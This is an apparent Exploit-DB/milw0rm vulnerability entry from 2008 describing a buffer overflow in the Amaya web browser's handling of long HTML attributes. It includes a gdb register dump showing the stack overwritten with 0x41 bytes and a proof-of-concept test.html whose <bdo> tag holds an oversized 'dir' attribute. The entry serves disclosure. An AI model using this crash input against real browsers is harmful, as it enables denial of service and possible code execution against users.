Amaya Web Browser html tag overflow

vendor:

Amaya Web Browser

by:

milw0rm.com

8.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Amaya Web Browser

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Amaya Web Browser html tag overflow

Amaya Web Browser is prone to a buffer overflow vulnerability when processing HTML tags with overly long attributes. This issue is due to a failure in the application to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Upgrade to the latest version of Amaya Web Browser.

Source

Exploit-DB raw data:

Amaya Web Browser html tag overflow (quite a few tags are vulnerable)

(gdb) i r
eax            0x41414141    1094795585
ecx            0x0    0
edx            0xbfc0ff80    -1077870720
ebx            0x9ec1220    166466080
esp            0xbfc10064    0xbfc10064
ebp            0xbfc10268    0xbfc10268
esi            0xa2f64a0    170878112
edi            0xbfc10160    -1077870240
eip            0x8144b40    0x8144b40 <EndOfHTMLAttributeValue(char*, _AttributeMapping*, int*, int*, bool, _ParserData*, bool)+2352>
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb) x/10x $ebp
0xbfc10268:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfc10278:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfc10288:    0x41414141    0x41414141


#cat test.html
<bdo dir="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" >webDEViL</bdo>

# milw0rm.com [2008-12-15]